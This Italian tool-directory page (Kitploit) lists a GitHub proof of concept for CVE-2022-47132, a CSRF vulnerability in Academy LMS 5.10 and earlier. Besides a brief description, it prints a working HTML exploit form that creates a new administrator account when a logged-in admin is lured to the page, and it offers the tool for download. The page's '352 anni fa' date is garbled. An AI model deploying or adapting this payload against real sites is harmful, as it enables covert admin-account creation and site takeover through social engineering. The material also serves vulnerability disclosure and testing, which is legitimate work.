Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-47132 — Academy LMS <= 5.10 CSRF | Kitploit
Strumenti/GitHubGitHub/openxp-research/cve-2022-47132
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingIngegneria Sociale
GitHubopenxp-research/cve-2022-47132

CVE-2022-47132

Academy LMS <= 5.10 CSRF

Vedi Repository
352 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-47132

Academy LMS <= 5.10 CSRF

Descrizione

Academy LMS è un'applicazione in cui gli utenti possono creare e pubblicizzare corsi. La funzionalità che consente di aggiungere un nuovo utente amministratore è vulnerabile a CSRF, rendendo possibile l'uso dell'ingegneria sociale per ottenere l'accesso come amministratore sulla piattaforma.

#Prova di concetto (POC) Il primo passo della nostra prova di concetto consiste nell'autenticarsi alla piattaforma con un utente amministratore.

Successivamente, è sufficiente accedere alla pagina che contiene il codice per sfruttare la vulnerabilità e osservare che un nuovo utente amministratore è stato aggiunto al sistema.

Codice utilizzato nell'exploit:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://target.com/academy/admin/admins/add" method="POST">
      <input type="hidden" name="first&#95;name" value="csrf" />
      <input type="hidden" name="last&#95;name" value="vinix" />
      <input type="hidden" name="biography" value="&lt;p&gt;csrf&#32;poc&lt;&#47;p&gt;" />
      <input type="hidden" name="files" value="" />
      <input type="hidden" name="user&#95;image" value="" />
      <input type="hidden" name="email" value="username" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="facebook&#95;link" value="" />
      <input type="hidden" name="twitter&#95;link" value="" />
      <input type="hidden" name="linkedin&#95;link" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Scarica lo strumento